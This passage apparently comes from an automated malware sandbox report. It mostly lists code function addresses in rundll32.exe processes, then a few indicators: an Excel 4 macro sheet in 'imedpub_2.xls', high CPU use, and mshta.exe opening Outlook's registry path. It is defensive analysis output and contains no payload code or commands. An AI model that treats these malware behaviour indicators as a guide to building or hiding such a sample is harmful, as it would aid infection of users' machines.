                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00202BD910_2_00202BD9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003600711_2_10036007
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1004105011_2_10041050
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003130F11_2_1003130F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_100323E211_2_100323E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003046011_2_10030460
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1004159211_2_10041592
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003E59F11_2_1003E59F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003960C11_2_1003960C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_100317E211_2_100317E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10040B0E11_2_10040B0E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10031BB611_2_10031BB6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10041C5611_2_10041C56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10036CB511_2_10036CB5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1001CD1611_2_1001CD16
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10042D2111_2_10042D21
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10031FC211_2_10031FC2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0026F8FD11_2_0026F8FD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0026E99111_2_0026E991
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0026AB8711_2_0026AB87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027000111_2_00270001
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0026901111_2_00269011
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027907F11_2_0027907F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0026205111_2_00262051
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0028005611_2_00280056
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002670B311_2_002670B3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002720BA11_2_002720BA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0026F09B11_2_0026F09B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027411611_2_00274116
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002681B711_2_002681B7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002651BB11_2_002651BB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0026225111_2_00262251
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027A2E811_2_0027A2E8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0026B2C711_2_0026B2C7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0026E2CC11_2_0026E2CC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0026536111_2_00265361
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0026434611_2_00264346
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002813AD11_2_002813AD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027C3A011_2_0027C3A0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027D38911_2_0027D389
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027E39511_2_0027E395
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027F43511_2_0027F435
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027044F11_2_0027044F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002664E211_2_002664E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027851911_2_00278519
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0026554811_2_00265548
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027255011_2_00272550
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0026A55F11_2_0026A55F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002795FA11_2_002795FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0026E5CF11_2_0026E5CF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027C63111_2_0027C631
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027860611_2_00278606
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027A66611_2_0027A666
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002766CA11_2_002766CA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0026D6D811_2_0026D6D8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0026773511_2_00267735
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027473C11_2_0027473C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0026971411_2_00269714
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027176B11_2_0027176B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0026B74D11_2_0026B74D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0026481611_2_00264816
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027188911_2_00271889
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0026896911_2_00268969
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027894B11_2_0027894B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002809B511_2_002809B5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002659F211_2_002659F2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027AA3011_2_0027AA30
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00261A5611_2_00261A56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0026EA9911_2_0026EA99
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027BB2311_2_0027BB23
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00268B3D11_2_00268B3D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00270B1911_2_00270B19
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0026BB7E11_2_0026BB7E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027CB5B11_2_0027CB5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00277BA611_2_00277BA6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00274B8711_2_00274B87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00269B8311_2_00269B83
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00278BE311_2_00278BE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027DBEA11_2_0027DBEA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00279BCF11_2_00279BCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00262BD911_2_00262BD9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00267C3711_2_00267C37
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00263C3C11_2_00263C3C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027AC3A11_2_0027AC3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00280C1411_2_00280C14
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00276C4911_2_00276C49
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00264C5D11_2_00264C5D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027DCF711_2_0027DCF7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00275CC411_2_00275CC4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00266D2411_2_00266D24
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00276DF811_2_00276DF8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00269DCF11_2_00269DCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00277DD511_2_00277DD5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027BE2711_2_0027BE27
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00280E3A11_2_00280E3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00263E3F11_2_00263E3F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00265E6011_2_00265E60
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027AE6D11_2_0027AE6D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00270E5311_2_00270E53
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0026EE8111_2_0026EE81
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00264EE311_2_00264EE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00279EEC11_2_00279EEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0026AEFB11_2_0026AEFB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027DEDC11_2_0027DEDC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00280F3311_2_00280F33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0026CF4711_2_0026CF47
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00267FF211_2_00267FF2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0026DFF311_2_0026DFF3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00353C3C12_2_00353C3C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035901112_2_00359011
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036044F12_2_0036044F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003620BA12_2_003620BA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035F8FD12_2_0035F8FD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035D6D812_2_0035D6D8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036473C12_2_0036473C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036411612_2_00364116
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003713AD12_2_003713AD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035AB8712_2_0035AB87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00357FF212_2_00357FF2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003559F212_2_003559F2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003695FA12_2_003695FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00357C3712_2_00357C37
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036F43512_2_0036F435
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036AA3012_2_0036AA30
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036C63112_2_0036C631
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00353E3F12_2_00353E3F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036AC3A12_2_0036AC3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00370E3A12_2_00370E3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036BE2712_2_0036BE27
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00370C1412_2_00370C14
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035481612_2_00354816
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036860612_2_00368606
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036000112_2_00360001
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036907F12_2_0036907F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036A66612_2_0036A666
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00355E6012_2_00355E60
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036AE6D12_2_0036AE6D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0037005612_2_00370056
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00351A5612_2_00351A56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035205112_2_00352051
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035225112_2_00352251
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00360E5312_2_00360E53
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00354C5D12_2_00354C5D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00366C4912_2_00366C49
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003570B312_2_003570B3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035EA9912_2_0035EA99
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035F09B12_2_0035F09B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035EE8112_2_0035EE81
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036188912_2_00361889
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036DCF712_2_0036DCF7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035AEFB12_2_0035AEFB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00354EE312_2_00354EE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003564E212_2_003564E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00369EEC12_2_00369EEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036A2E812_2_0036A2E8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036DEDC12_2_0036DEDC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035B2C712_2_0035B2C7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00365CC412_2_00365CC4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035E2CC12_2_0035E2CC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003666CA12_2_003666CA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035773512_2_00357735
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00370F3312_2_00370F33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00358B3D12_2_00358B3D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00356D2412_2_00356D24
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036BB2312_2_0036BB23
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035971412_2_00359714
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036851912_2_00368519
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00360B1912_2_00360B19
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035BB7E12_2_0035BB7E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035536112_2_00355361
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035896912_2_00358969
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036176B12_2_0036176B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036255012_2_00362550
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035A55F12_2_0035A55F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036CB5B12_2_0036CB5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035CF4712_2_0035CF47
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035434612_2_00354346
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035B74D12_2_0035B74D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035554812_2_00355548
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036894B12_2_0036894B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003709B512_2_003709B5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003581B712_2_003581B7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003551BB12_2_003551BB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00367BA612_2_00367BA6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036C3A012_2_0036C3A0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036E39512_2_0036E395
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035E99112_2_0035E991
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00364B8712_2_00364B87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00359B8312_2_00359B83
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036D38912_2_0036D389
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035DFF312_2_0035DFF3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00366DF812_2_00366DF8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00368BE312_2_00368BE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036DBEA12_2_0036DBEA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00367DD512_2_00367DD5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00352BD912_2_00352BD9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00369BCF12_2_00369BCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00359DCF12_2_00359DCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035E5CF12_2_0035E5CF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0024F8FD14_2_0024F8FD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0024AB8714_2_0024AB87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0024E99114_2_0024E991
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0025BE2714_2_0025BE27
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0025F43514_2_0025F435
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00247C3714_2_00247C37
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0025C63114_2_0025C631
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0025AA3014_2_0025AA30
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00243C3C14_2_00243C3C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00243E3F14_2_00243E3F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00260E3A14_2_00260E3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0025AC3A14_2_0025AC3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0025860614_2_00258606
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0025000114_2_00250001
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0024481614_2_00244816
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00260C1414_2_00260C14
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0024901114_2_00249011
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0025A66614_2_0025A666
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00245E6014_2_00245E60
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0025AE6D14_2_0025AE6D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0025907F14_2_0025907F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0025044F14_2_0025044F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00256C4914_2_00256C49
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0026005614_2_00260056
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00241A5614_2_00241A56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0024205114_2_00242051
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0024225114_2_00242251
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00250E5314_2_00250E53
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00244C5D14_2_00244C5D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002470B314_2_002470B3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002520BA14_2_002520BA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0024EE8114_2_0024EE81
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0025188914_2_00251889
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0024EA9914_2_0024EA99
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0024F09B14_2_0024F09B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002464E214_2_002464E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00244EE314_2_00244EE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00259EEC14_2_00259EEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0025A2E814_2_0025A2E8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0025DCF714_2_0025DCF7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0024AEFB14_2_0024AEFB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00255CC414_2_00255CC4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0024B2C714_2_0024B2C7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0024E2CC14_2_0024E2CC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002566CA14_2_002566CA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0025DEDC14_2_0025DEDC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0024D6D814_2_0024D6D8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00246D2414_2_00246D24
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0025BB2314_2_0025BB23
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0024773514_2_00247735
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00260F3314_2_00260F33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0025473C14_2_0025473C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00248B3D14_2_00248B3D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0024971414_2_00249714
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0025411614_2_00254116
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0025851914_2_00258519
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00250B1914_2_00250B19
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0024536114_2_00245361
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0024896914_2_00248969
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0025176B14_2_0025176B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0024BB7E14_2_0024BB7E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0024434614_2_00244346
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0024CF4714_2_0024CF47
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0024B74D14_2_0024B74D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0024554814_2_00245548
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0025894B14_2_0025894B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0025255014_2_00252550
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0024A55F14_2_0024A55F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0025CB5B14_2_0025CB5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00257BA614_2_00257BA6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0025C3A014_2_0025C3A0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002613AD14_2_002613AD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002609B514_2_002609B5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002481B714_2_002481B7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002451BB14_2_002451BB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00254B8714_2_00254B87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00249B8314_2_00249B83
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0025D38914_2_0025D389
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0025E39514_2_0025E395
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00258BE314_2_00258BE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0025DBEA14_2_0025DBEA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00247FF214_2_00247FF2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002459F214_2_002459F2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0024DFF314_2_0024DFF3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00256DF814_2_00256DF8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002595FA14_2_002595FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00259BCF14_2_00259BCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00249DCF14_2_00249DCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0024E5CF14_2_0024E5CF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00257DD514_2_00257DD5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00242BD914_2_00242BD9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0018901115_2_00189011
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00183C3C15_2_00183C3C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0019044F15_2_0019044F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_001920BA15_2_001920BA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0018D6D815_2_0018D6D8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0018F8FD15_2_0018F8FD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0019411615_2_00194116
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0019473C15_2_0019473C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0018AB8715_2_0018AB87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_001A13AD15_2_001A13AD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_001995FA15_2_001995FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00187FF215_2_00187FF2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_001859F215_2_001859F2
                            Source: 48F2.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess Stats: CPU usage > 98%
                            Source: imedpub_2.xlsMacro extractor: Sheet name: Macro1
                            Source: imedpub_2.xlsMacro extractor: Sheet name: Macro1
                            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
